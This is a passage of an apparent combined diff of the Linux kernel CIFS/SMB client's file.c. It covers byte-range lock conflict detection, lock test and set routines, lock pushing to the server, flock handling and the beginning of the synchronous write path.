++			    struct cifsLockInfo **conf_lock, int rw_check)
++{
++	struct cifsLockInfo *li;
++	struct cifsFileInfo *cur_cfile = fdlocks->cfile;
++	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
++
++	list_for_each_entry(li, &fdlocks->locks, llist) {
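++		/* skip locks that do not overlap the requested range */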
++		if (offset + length <= li->offset ||
++		    offset >= li->offset + li->length)
++			continue;
++		if (rw_check != CIFS_LOCK_OP && current->tgid == li->pid &&
++		    server->ops->compare_fids(cfile, cur_cfile)) {
++			/* shared lock prevents write op through the same fid */
++			if (!(li->type & server->vals->shared_lock_type) ||
++			    rw_check != CIFS_WRITE_OP)
++				continue;
++		}
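++		/*
++		 * A requested shared lock does not conflict with a lock of
++		 * the same type, nor with a lock held by the same owner
++		 * through the same fid.
++		 */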
++		if ((type & server->vals->shared_lock_type) &&
++		    ((server->ops->compare_fids(cfile, cur_cfile) &&
++		     current->tgid == li->pid) || type == li->type))
++			continue;
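++		/* for lock requests, OFD locks through the same fid do not conflict */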
++		if (rw_check == CIFS_LOCK_OP &&
++		    (flags & FL_OFDLCK) && (li->flags & FL_OFDLCK) &&
++		    server->ops->compare_fids(cfile, cur_cfile))
++			continue;
++		if (conf_lock)
++			*conf_lock = li;
++		return true;
++	}
++	return false;
++}
++
++bool
++cifs_find_lock_conflict(struct cifsFileInfo *cfile, __u64 offset, __u64 length,
++			__u8 type, __u16 flags,
++			struct cifsLockInfo **conf_lock, int rw_check)
++{
++	bool rc = false;
++	struct cifs_fid_locks *cur;
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++
++	list_for_each_entry(cur, &cinode->llist, llist) {
++		rc = cifs_find_fid_lock_conflict(cur, offset, length, type,
++						 flags, cfile, conf_lock,
++						 rw_check);
++		if (rc)
++			break;
++	}
++
++	return rc;
++}
++
++/*
++ * Check if there is another lock that prevents us from setting the lock
++ * (mandatory style). If such a lock exists, update the flock structure with
++ * its properties. Otherwise, set the flock type to F_UNLCK if we can cache
++ * brlocks, or leave it the same if we can't. Returns 0 if we don't need to
++ * send a request to the server, or 1 otherwise.
++ */
++static int
++cifs_lock_test(struct cifsFileInfo *cfile, __u64 offset, __u64 length,
++	       __u8 type, struct file_lock *flock)
++{
++	int rc = 0;
++	struct cifsLockInfo *conf_lock;
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
++	bool exist;
++
++	down_read(&cinode->lock_sem);
++
++	exist = cifs_find_lock_conflict(cfile, offset, length, type,
++					flock->fl_flags, &conf_lock,
++					CIFS_LOCK_OP);
++	if (exist) {
++		flock->fl_start = conf_lock->offset;
++		flock->fl_end = conf_lock->offset + conf_lock->length - 1;
++		flock->fl_pid = conf_lock->pid;
++		if (conf_lock->type & server->vals->shared_lock_type)
++			flock->fl_type = F_RDLCK;
++		else
++			flock->fl_type = F_WRLCK;
++	} else if (!cinode->can_cache_brlcks)
++		rc = 1;
++	else
++		flock->fl_type = F_UNLCK;
++
++	up_read(&cinode->lock_sem);
++	return rc;
++}
++
++static void
++cifs_lock_add(struct cifsFileInfo *cfile, struct cifsLockInfo *lock)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	cifs_down_write(&cinode->lock_sem);
++	list_add_tail(&lock->llist, &cfile->llist->locks);
++	up_write(&cinode->lock_sem);
++}
++
++/*
++ * Set the byte-range lock (mandatory style). Returns:
++ * 1) 0, if we set the lock and don't need to send a request to the server;
++ * 2) 1, if no locks prevent us but we need to send a request to the server;
++ * 3) -EACCES, if there is a lock that prevents us and wait is false.
++ */
++static int
++cifs_lock_add_if(struct cifsFileInfo *cfile, struct cifsLockInfo *lock,
++		 bool wait)
++{
++	struct cifsLockInfo *conf_lock;
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	bool exist;
++	int rc = 0;
++
++try_again:
++	exist = false;
++	cifs_down_write(&cinode->lock_sem);
++
++	exist = cifs_find_lock_conflict(cfile, lock->offset, lock->length,
++					lock->type, lock->flags, &conf_lock,
++					CIFS_LOCK_OP);
++	if (!exist && cinode->can_cache_brlcks) {
++		list_add_tail(&lock->llist, &cfile->llist->locks);
++		up_write(&cinode->lock_sem);
++		return rc;
++	}
++
++	if (!exist)
++		rc = 1;
++	else if (!wait)
++		rc = -EACCES;
++	else {
++		list_add_tail(&lock->blist, &conf_lock->blist);
++		up_write(&cinode->lock_sem);
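++		/*
++		 * An empty blist (prev == next == &lock->blist) means
++		 * cifs_del_lock_waiters() removed us, i.e. the conflicting
++		 * lock was released.
++		 */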
++		rc = wait_event_interruptible(lock->block_q,
++					(lock->blist.prev == &lock->blist) &&
++					(lock->blist.next == &lock->blist));
++		if (!rc)
++			goto try_again;
++		cifs_down_write(&cinode->lock_sem);
++		list_del_init(&lock->blist);
++	}
++
++	up_write(&cinode->lock_sem);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++/*
++ * Check if there is another lock that prevents us from setting the lock
++ * (posix style). If such a lock exists, update the flock structure with
++ * its properties. Otherwise, set the flock type to F_UNLCK if we can cache
++ * brlocks, or leave it the same if we can't. Returns 0 if we don't need to
++ * send a request to the server, or 1 otherwise.
++ */
++static int
++cifs_posix_lock_test(struct file *file, struct file_lock *flock)
++{
++	int rc = 0;
++	struct cifsInodeInfo *cinode = CIFS_I(file_inode(file));
++	unsigned char saved_type = flock->fl_type;
++
++	if ((flock->fl_flags & FL_POSIX) == 0)
++		return 1;
++
++	down_read(&cinode->lock_sem);
++	posix_test_lock(file, flock);
++
++	if (flock->fl_type == F_UNLCK && !cinode->can_cache_brlcks) {
++		flock->fl_type = saved_type;
++		rc = 1;
++	}
++
++	up_read(&cinode->lock_sem);
++	return rc;
++}
++
++/*
++ * Set the byte-range lock (posix style). Returns:
++ * 1) <0, if an error occurs while setting the lock;
++ * 2) 0, if we set the lock and don't need to send a request to the server;
++ * 3) FILE_LOCK_DEFERRED, if we will wait for some other file_lock;
++ * 4) FILE_LOCK_DEFERRED + 1, if we need to send a request to the server.
++ */
++static int
++cifs_posix_lock_set(struct file *file, struct file_lock *flock)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(file_inode(file));
++	int rc = FILE_LOCK_DEFERRED + 1;
++
++	if ((flock->fl_flags & FL_POSIX) == 0)
++		return rc;
++
++	cifs_down_write(&cinode->lock_sem);
++	if (!cinode->can_cache_brlcks) {
++		up_write(&cinode->lock_sem);
++		return rc;
++	}
++
++	rc = posix_lock_file(file, flock, NULL);
++	up_write(&cinode->lock_sem);
++	return rc;
++}
++
++int
++cifs_push_mandatory_locks(struct cifsFileInfo *cfile)
++{
++	unsigned int xid;
++	int rc = 0, stored_rc;
++	struct cifsLockInfo *li, *tmp;
++	struct cifs_tcon *tcon;
++	unsigned int num, max_num, max_buf;
++	LOCKING_ANDX_RANGE *buf, *cur;
++	static const int types[] = {
++		LOCKING_ANDX_LARGE_FILES,
++		LOCKING_ANDX_SHARED_LOCK | LOCKING_ANDX_LARGE_FILES
++	};
++	int i;
++
++	xid = get_xid();
++	tcon = tlink_tcon(cfile->tlink);
++
++	/*
++	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
++	 * and check it before using.
++	 */
++	max_buf = tcon->ses->server->maxBuf;
++	if (max_buf < (sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE))) {
++		free_xid(xid);
++		return -EINVAL;
++	}
++
++	BUILD_BUG_ON(sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE) >
++		     PAGE_SIZE);
++	max_buf = min_t(unsigned int, max_buf - sizeof(struct smb_hdr),
++			PAGE_SIZE);
++	max_num = (max_buf - sizeof(struct smb_hdr)) /
++						sizeof(LOCKING_ANDX_RANGE);
++	buf = kcalloc(max_num, sizeof(LOCKING_ANDX_RANGE), GFP_KERNEL);
++	if (!buf) {
++		free_xid(xid);
++		return -ENOMEM;
++	}
++
++	for (i = 0; i < 2; i++) {
++		cur = buf;
++		num = 0;
++		list_for_each_entry_safe(li, tmp, &cfile->llist->locks, llist) {
++			if (li->type != types[i])
++				continue;
++			cur->Pid = cpu_to_le16(li->pid);
++			cur->LengthLow = cpu_to_le32((u32)li->length);
++			cur->LengthHigh = cpu_to_le32((u32)(li->length>>32));
++			cur->OffsetLow = cpu_to_le32((u32)li->offset);
++			cur->OffsetHigh = cpu_to_le32((u32)(li->offset>>32));
++			if (++num == max_num) {
++				stored_rc = cifs_lockv(xid, tcon,
++						       cfile->fid.netfid,
++						       (__u8)li->type, 0, num,
++						       buf);
++				if (stored_rc)
++					rc = stored_rc;
++				cur = buf;
++				num = 0;
++			} else
++				cur++;
++		}
++
++		if (num) {
++			stored_rc = cifs_lockv(xid, tcon, cfile->fid.netfid,
++					       (__u8)types[i], 0, num, buf);
++			if (stored_rc)
++				rc = stored_rc;
++		}
++	}
++
++	kfree(buf);
++	free_xid(xid);
++	return rc;
++}
++
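++/*
++ * Map the opaque fl_owner_t to a 32-bit on-the-wire lock "pid"; XORing the
++ * pointer hash with the random cifs_lock_secret avoids leaking kernel
++ * pointer values to the server.
++ */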
++static __u32
++hash_lockowner(fl_owner_t owner)
++{
++	return cifs_lock_secret ^ hash32_ptr((const void *)owner);
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++struct lock_to_push {
++	struct list_head llist;
++	__u64 offset;
++	__u64 length;
++	__u32 pid;
++	__u16 netfid;
++	__u8 type;
++};
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static int
++cifs_push_posix_locks(struct cifsFileInfo *cfile)
++{
++	struct inode *inode = d_inode(cfile->dentry);
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct file_lock *flock;
++	struct file_lock_context *flctx = inode->i_flctx;
++	unsigned int count = 0, i;
++	int rc = 0, xid, type;
++	struct list_head locks_to_send, *el;
++	struct lock_to_push *lck, *tmp;
++	__u64 length;
++
++	xid = get_xid();
++
++	if (!flctx)
++		goto out;
++
++	spin_lock(&flctx->flc_lock);
++	list_for_each(el, &flctx->flc_posix) {
++		count++;
++	}
++	spin_unlock(&flctx->flc_lock);
++
++	INIT_LIST_HEAD(&locks_to_send);
++
++	/*
++	 * Allocating count locks is enough because no FL_POSIX locks can be
++	 * added to the list while we are holding cinode->lock_sem that
++	 * protects locking operations of this inode.
++	 */
++	for (i = 0; i < count; i++) {
++		lck = kmalloc(sizeof(struct lock_to_push), GFP_KERNEL);
++		if (!lck) {
++			rc = -ENOMEM;
++			goto err_out;
++		}
++		list_add_tail(&lck->llist, &locks_to_send);
++	}
++
++	el = locks_to_send.next;
++	spin_lock(&flctx->flc_lock);
++	list_for_each_entry(flock, &flctx->flc_posix, fl_list) {
++		if (el == &locks_to_send) {
++			/*
++			 * The list ended. We don't have enough allocated
++			 * structures - something is really wrong.
++			 */
++			cifs_dbg(VFS, "Can't push all brlocks!\n");
++			break;
++		}
++		length = cifs_flock_len(flock);
++		if (flock->fl_type == F_RDLCK || flock->fl_type == F_SHLCK)
++			type = CIFS_RDLCK;
++		else
++			type = CIFS_WRLCK;
++		lck = list_entry(el, struct lock_to_push, llist);
++		lck->pid = hash_lockowner(flock->fl_owner);
++		lck->netfid = cfile->fid.netfid;
++		lck->length = length;
++		lck->type = type;
++		lck->offset = flock->fl_start;
++	}
++	spin_unlock(&flctx->flc_lock);
++
++	list_for_each_entry_safe(lck, tmp, &locks_to_send, llist) {
++		int stored_rc;
++
++		stored_rc = CIFSSMBPosixLock(xid, tcon, lck->netfid, lck->pid,
++					     lck->offset, lck->length, NULL,
++					     lck->type, 0);
++		if (stored_rc)
++			rc = stored_rc;
++		list_del(&lck->llist);
++		kfree(lck);
++	}
++
++out:
++	free_xid(xid);
++	return rc;
++err_out:
++	list_for_each_entry_safe(lck, tmp, &locks_to_send, llist) {
++		list_del(&lck->llist);
++		kfree(lck);
++	}
++	goto out;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static int
++cifs_push_locks(struct cifsFileInfo *cfile)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	int rc = 0;
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	struct cifs_sb_info *cifs_sb = CIFS_SB(cfile->dentry->d_sb);
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	/* we are going to update can_cache_brlcks here - need a write access */
++	cifs_down_write(&cinode->lock_sem);
++	if (!cinode->can_cache_brlcks) {
++		up_write(&cinode->lock_sem);
++		return rc;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (cap_unix(tcon->ses) &&
++	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
++	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
++		rc = cifs_push_posix_locks(cfile);
++	else
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		rc = tcon->ses->server->ops->push_mand_locks(cfile);
++
++	cinode->can_cache_brlcks = false;
++	up_write(&cinode->lock_sem);
++	return rc;
++}
++
++static void
++cifs_read_flock(struct file_lock *flock, __u32 *type, int *lock, int *unlock,
++		bool *wait_flag, struct TCP_Server_Info *server)
++{
++	if (flock->fl_flags & FL_POSIX)
++		cifs_dbg(FYI, "Posix\n");
++	if (flock->fl_flags & FL_FLOCK)
++		cifs_dbg(FYI, "Flock\n");
++	if (flock->fl_flags & FL_SLEEP) {
++		cifs_dbg(FYI, "Blocking lock\n");
++		*wait_flag = true;
++	}
++	if (flock->fl_flags & FL_ACCESS)
++		cifs_dbg(FYI, "Process suspended by mandatory locking - not implemented yet\n");
++	if (flock->fl_flags & FL_LEASE)
++		cifs_dbg(FYI, "Lease on file - not implemented yet\n");
++	if (flock->fl_flags &
++	    (~(FL_POSIX | FL_FLOCK | FL_SLEEP |
++	       FL_ACCESS | FL_LEASE | FL_CLOSE | FL_OFDLCK)))
++		cifs_dbg(FYI, "Unknown lock flags 0x%x\n", flock->fl_flags);
++
++	*type = server->vals->large_lock_type;
++	if (flock->fl_type == F_WRLCK) {
++		cifs_dbg(FYI, "F_WRLCK\n");
++		*type |= server->vals->exclusive_lock_type;
++		*lock = 1;
++	} else if (flock->fl_type == F_UNLCK) {
++		cifs_dbg(FYI, "F_UNLCK\n");
++		*type |= server->vals->unlock_lock_type;
++		*unlock = 1;
++		/* Check if unlock includes more than one lock range */
++	} else if (flock->fl_type == F_RDLCK) {
++		cifs_dbg(FYI, "F_RDLCK\n");
++		*type |= server->vals->shared_lock_type;
++		*lock = 1;
++	} else if (flock->fl_type == F_EXLCK) {
++		cifs_dbg(FYI, "F_EXLCK\n");
++		*type |= server->vals->exclusive_lock_type;
++		*lock = 1;
++	} else if (flock->fl_type == F_SHLCK) {
++		cifs_dbg(FYI, "F_SHLCK\n");
++		*type |= server->vals->shared_lock_type;
++		*lock = 1;
++	} else
++		cifs_dbg(FYI, "Unknown type of lock\n");
++}
++
++static int
++cifs_getlk(struct file *file, struct file_lock *flock, __u32 type,
++	   bool wait_flag, bool posix_lck, unsigned int xid)
++{
++	int rc = 0;
++	__u64 length = cifs_flock_len(flock);
++	struct cifsFileInfo *cfile = (struct cifsFileInfo *)file->private_data;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	__u16 netfid = cfile->fid.netfid;
++
++	if (posix_lck) {
++		int posix_lock_type;
++
++		rc = cifs_posix_lock_test(file, flock);
++		if (!rc)
++			return rc;
++
++		if (type & server->vals->shared_lock_type)
++			posix_lock_type = CIFS_RDLCK;
++		else
++			posix_lock_type = CIFS_WRLCK;
++		rc = CIFSSMBPosixLock(xid, tcon, netfid,
++				      hash_lockowner(flock->fl_owner),
++				      flock->fl_start, length, flock,
++				      posix_lock_type, wait_flag);
++		return rc;
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	rc = cifs_lock_test(cfile, flock->fl_start, length, type, flock);
++	if (!rc)
++		return rc;
++
++	/* BB we could chain these into one lock request BB */
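++	/*
++	 * Probe for conflicts by trying to set the requested lock; if that
++	 * succeeds, release it immediately and report the range as unlocked.
++	 */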
++	rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length, type,
++				    1, 0, false);
++	if (rc == 0) {
++		rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
++					    type, 0, 1, false);
++		flock->fl_type = F_UNLCK;
++		if (rc != 0)
++			cifs_dbg(VFS, "Error unlocking previously locked range %d during test of lock\n",
++				 rc);
++		return 0;
++	}
++
++	if (type & server->vals->shared_lock_type) {
++		flock->fl_type = F_WRLCK;
++		return 0;
++	}
++
++	type &= ~server->vals->exclusive_lock_type;
++
++	rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
++				    type | server->vals->shared_lock_type,
++				    1, 0, false);
++	if (rc == 0) {
++		rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
++			type | server->vals->shared_lock_type, 0, 1, false);
++		flock->fl_type = F_RDLCK;
++		if (rc != 0)
++			cifs_dbg(VFS, "Error unlocking previously locked range %d during test of lock\n",
++				 rc);
++	} else
++		flock->fl_type = F_WRLCK;
++
++	return 0;
++}
++
++void
++cifs_move_llist(struct list_head *source, struct list_head *dest)
++{
++	struct list_head *li, *tmp;
++	list_for_each_safe(li, tmp, source)
++		list_move(li, dest);
++}
++
++void
++cifs_free_llist(struct list_head *llist)
++{
++	struct cifsLockInfo *li, *tmp;
++	list_for_each_entry_safe(li, tmp, llist, llist) {
++		cifs_del_lock_waiters(li);
++		list_del(&li->llist);
++		kfree(li);
++	}
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++int
++cifs_unlock_range(struct cifsFileInfo *cfile, struct file_lock *flock,
++		  unsigned int xid)
++{
++	int rc = 0, stored_rc;
++	static const int types[] = {
++		LOCKING_ANDX_LARGE_FILES,
++		LOCKING_ANDX_SHARED_LOCK | LOCKING_ANDX_LARGE_FILES
++	};
++	unsigned int i;
++	unsigned int max_num, num, max_buf;
++	LOCKING_ANDX_RANGE *buf, *cur;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct cifsLockInfo *li, *tmp;
++	__u64 length = cifs_flock_len(flock);
++	struct list_head tmp_llist;
++
++	INIT_LIST_HEAD(&tmp_llist);
++
++	/*
++	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
++	 * and check it before using.
++	 */
++	max_buf = tcon->ses->server->maxBuf;
++	if (max_buf < (sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE)))
++		return -EINVAL;
++
++	BUILD_BUG_ON(sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE) >
++		     PAGE_SIZE);
++	max_buf = min_t(unsigned int, max_buf - sizeof(struct smb_hdr),
++			PAGE_SIZE);
++	max_num = (max_buf - sizeof(struct smb_hdr)) /
++						sizeof(LOCKING_ANDX_RANGE);
++	buf = kcalloc(max_num, sizeof(LOCKING_ANDX_RANGE), GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	cifs_down_write(&cinode->lock_sem);
++	for (i = 0; i < 2; i++) {
++		cur = buf;
++		num = 0;
++		list_for_each_entry_safe(li, tmp, &cfile->llist->locks, llist) {
++			if (flock->fl_start > li->offset ||
++			    (flock->fl_start + length) <
++			    (li->offset + li->length))
++				continue;
++			if (current->tgid != li->pid)
++				continue;
++			if (types[i] != li->type)
++				continue;
++			if (cinode->can_cache_brlcks) {
++				/*
++				 * We can cache brlock requests - simply remove
++				 * a lock from the file's list.
++				 */
++				list_del(&li->llist);
++				cifs_del_lock_waiters(li);
++				kfree(li);
++				continue;
++			}
++			cur->Pid = cpu_to_le16(li->pid);
++			cur->LengthLow = cpu_to_le32((u32)li->length);
++			cur->LengthHigh = cpu_to_le32((u32)(li->length>>32));
++			cur->OffsetLow = cpu_to_le32((u32)li->offset);
++			cur->OffsetHigh = cpu_to_le32((u32)(li->offset>>32));
++			/*
++			 * We need to save a lock here to let us add it again to
++			 * the file's list if the unlock range request fails on
++			 * the server.
++			 */
++			list_move(&li->llist, &tmp_llist);
++			if (++num == max_num) {
++				stored_rc = cifs_lockv(xid, tcon,
++						       cfile->fid.netfid,
++						       li->type, num, 0, buf);
++				if (stored_rc) {
++					/*
++					 * We failed on the unlock range
++					 * request - add all locks from the tmp
++					 * list to the head of the file's list.
++					 */
++					cifs_move_llist(&tmp_llist,
++							&cfile->llist->locks);
++					rc = stored_rc;
++				} else
++					/*
++					 * The unlock range request succeeded -
++					 * free the tmp list.
++					 */
++					cifs_free_llist(&tmp_llist);
++				cur = buf;
++				num = 0;
++			} else
++				cur++;
++		}
++		if (num) {
++			stored_rc = cifs_lockv(xid, tcon, cfile->fid.netfid,
++					       types[i], num, 0, buf);
++			if (stored_rc) {
++				cifs_move_llist(&tmp_llist,
++						&cfile->llist->locks);
++				rc = stored_rc;
++			} else
++				cifs_free_llist(&tmp_llist);
++		}
++	}
++
++	up_write(&cinode->lock_sem);
++	kfree(buf);
++	return rc;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static int
++cifs_setlk(struct file *file, struct file_lock *flock, __u32 type,
++	   bool wait_flag, bool posix_lck, int lock, int unlock,
++	   unsigned int xid)
++{
++	int rc = 0;
++	__u64 length = cifs_flock_len(flock);
++	struct cifsFileInfo *cfile = (struct cifsFileInfo *)file->private_data;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct inode *inode = d_inode(cfile->dentry);
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (posix_lck) {
++		int posix_lock_type;
++
++		rc = cifs_posix_lock_set(file, flock);
++		if (rc <= FILE_LOCK_DEFERRED)
++			return rc;
++
++		if (type & server->vals->shared_lock_type)
++			posix_lock_type = CIFS_RDLCK;
++		else
++			posix_lock_type = CIFS_WRLCK;
++
++		if (unlock == 1)
++			posix_lock_type = CIFS_UNLCK;
++
++		rc = CIFSSMBPosixLock(xid, tcon, cfile->fid.netfid,
++				      hash_lockowner(flock->fl_owner),
++				      flock->fl_start, length,
++				      NULL, posix_lock_type, wait_flag);
++		goto out;
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	if (lock) {
++		struct cifsLockInfo *lock;
++
++		lock = cifs_lock_init(flock->fl_start, length, type,
++				      flock->fl_flags);
++		if (!lock)
++			return -ENOMEM;
++
++		rc = cifs_lock_add_if(cfile, lock, wait_flag);
++		if (rc < 0) {
++			kfree(lock);
++			return rc;
++		}
++		if (!rc)
++			goto out;
++
++		/*
++		 * A Windows 7 server can delay breaking a lease from read to
++		 * None if we set a byte-range lock on a file - break it
++		 * explicitly before sending the lock to the server to be sure
++		 * the next read won't conflict with non-overlapping locks due
++		 * to page reading.
++		 */
++		if (!CIFS_CACHE_WRITE(CIFS_I(inode)) &&
++					CIFS_CACHE_READ(CIFS_I(inode))) {
++			cifs_zap_mapping(inode);
++			cifs_dbg(FYI, "Set no oplock for inode=%p due to mand locks\n",
++				 inode);
++			CIFS_I(inode)->oplock = 0;
++		}
++
++		rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
++					    type, 1, 0, wait_flag);
++		if (rc) {
++			kfree(lock);
++			return rc;
++		}
++
++		cifs_lock_add(cfile, lock);
++	} else if (unlock)
++		rc = server->ops->mand_unlock_range(cfile, flock, xid);
++
++out:
++	if ((flock->fl_flags & FL_POSIX) || (flock->fl_flags & FL_FLOCK)) {
++		/*
++		 * If this is a request to remove all locks because we
++		 * are closing the file, it doesn't matter if the
++		 * unlocking failed as both cifs.ko and the SMB server
++		 * remove the lock on file close
++		 */
++		if (rc) {
++			cifs_dbg(VFS, "%s failed rc=%d\n", __func__, rc);
++			if (!(flock->fl_flags & FL_CLOSE))
++				return rc;
++		}
++		rc = locks_lock_file_wait(file, flock);
++	}
++	return rc;
++}
++
++int cifs_flock(struct file *file, int cmd, struct file_lock *fl)
++{
++	int rc, xid;
++	int lock = 0, unlock = 0;
++	bool wait_flag = false;
++	bool posix_lck = false;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_tcon *tcon;
++	struct cifsFileInfo *cfile;
++	__u32 type;
++
++	xid = get_xid();
++
++	if (!(fl->fl_flags & FL_FLOCK)) {
++		rc = -ENOLCK;
++		free_xid(xid);
++		return rc;
++	}
++
++	cfile = (struct cifsFileInfo *)file->private_data;
++	tcon = tlink_tcon(cfile->tlink);
++
++	cifs_read_flock(fl, &type, &lock, &unlock, &wait_flag,
++			tcon->ses->server);
++	cifs_sb = CIFS_FILE_SB(file);
++
++	if (cap_unix(tcon->ses) &&
++	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
++	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
++		posix_lck = true;
++
++	if (!lock && !unlock) {
++		/*
++		 * If neither a lock nor an unlock was requested, there is
++		 * nothing to do since we do not know what it is.
++		 */
++		rc = -EOPNOTSUPP;
++		free_xid(xid);
++		return rc;
++	}
++
++	rc = cifs_setlk(file, fl, type, wait_flag, posix_lck, lock, unlock,
++			xid);
++	free_xid(xid);
++	return rc;
++}
++
++int cifs_lock(struct file *file, int cmd, struct file_lock *flock)
++{
++	int rc, xid;
++	int lock = 0, unlock = 0;
++	bool wait_flag = false;
++	bool posix_lck = false;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_tcon *tcon;
++	struct cifsFileInfo *cfile;
++	__u32 type;
++
++	rc = -EACCES;
++	xid = get_xid();
++
++	cifs_dbg(FYI, "%s: %pD2 cmd=0x%x type=0x%x flags=0x%x r=%lld:%lld\n", __func__, file, cmd,
++		 flock->fl_flags, flock->fl_type, (long long)flock->fl_start,
++		 (long long)flock->fl_end);
++
++	cfile = (struct cifsFileInfo *)file->private_data;
++	tcon = tlink_tcon(cfile->tlink);
++
++	cifs_read_flock(flock, &type, &lock, &unlock, &wait_flag,
++			tcon->ses->server);
++	cifs_sb = CIFS_FILE_SB(file);
++	set_bit(CIFS_INO_CLOSE_ON_LOCK, &CIFS_I(d_inode(cfile->dentry))->flags);
++
++	if (cap_unix(tcon->ses) &&
++	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
++	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
++		posix_lck = true;
++	/*
++	 * BB add code here to normalize offset and length to account for
++	 * negative length, which we cannot accept over the wire.
++	 */
++	if (IS_GETLK(cmd)) {
++		rc = cifs_getlk(file, flock, type, wait_flag, posix_lck, xid);
++		free_xid(xid);
++		return rc;
++	}
++
++	if (!lock && !unlock) {
++		/*
++		 * If neither a lock nor an unlock was requested, there is
++		 * nothing to do since we do not know what it is.
++		 */
++		free_xid(xid);
++		return -EOPNOTSUPP;
++	}
++
++	rc = cifs_setlk(file, flock, type, wait_flag, posix_lck, lock, unlock,
++			xid);
++	free_xid(xid);
++	return rc;
++}
++
++/*
++ * Update the file size (if needed) after a write. Should be called with
++ * the inode->i_lock held.
++ */
++void
++cifs_update_eof(struct cifsInodeInfo *cifsi, loff_t offset,
++		      unsigned int bytes_written)
++{
++	loff_t end_of_write = offset + bytes_written;
++
++	if (end_of_write > cifsi->server_eof)
++		cifsi->server_eof = end_of_write;
++}
++
++static ssize_t
++cifs_write(struct cifsFileInfo *open_file, __u32 pid, const char *write_data,
++	   size_t write_size, loff_t *offset)
++{
++	int rc = 0;
++	unsigned int bytes_written = 0;
++	unsigned int total_written;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	unsigned int xid;
++	struct dentry *dentry = open_file->dentry;
++	struct cifsInodeInfo *cifsi = CIFS_I(d_inode(dentry));
++	struct cifs_io_parms io_parms = {0};
++
++	cifs_dbg(FYI, "write %zd bytes to offset %lld of %pd\n",
++		 write_size, *offset, dentry);
++
++	tcon = tlink_tcon(open_file->tlink);
++	server = tcon->ses->server;
++
++	if (!server->ops->sync_write)
++		return -ENOSYS;
++
++	xid = get_xid();
++
++	for (total_written = 0; write_size > total_written;
++	     total_written += bytes_written) {
++		rc = -EAGAIN;
++		while (rc == -EAGAIN) {
++			struct kvec iov[2];
++			unsigned int len;
++
++			if (open_file->invalidHandle) {
++				/*
++				 * We could deadlock if we called
++				 * filemap_fdatawait from here, so tell
++				 * reopen_file not to flush data to the
++				 * server now.
++				 */
++				rc = cifs_reopen_file(open_file, false);
++				if (rc != 0)
++					break;
++			}
++
++			len = min(server->ops->wp_retry_size(d_inode(dentry)),
++				  (unsigned int)write_size - total_written);
++			/* iov[0] is reserved for smb header */
++			iov[1].iov_base = (char *)write_data + total_written;
++			iov[1].iov_len = len;
++			io_parms.pid = pid;
++			io_parms.tcon = tcon;
++			io_parms.offset = *offset;
++			io_parms.length = len;
++			rc = server->ops->sync_write(xid, &open_file->fid,
++					&io_parms, &bytes_written, iov, 1);
++		}
++		if (rc || (bytes_written == 0)) {
++			if (total_written)
++				break;
++			else {
++				free_xid(xid);
++				return rc;
++			}
++		} else {
++			spin_lock(&d_inode(dentry)->i_lock);
++			cifs_update_eof(cifsi, *offset, bytes_written);
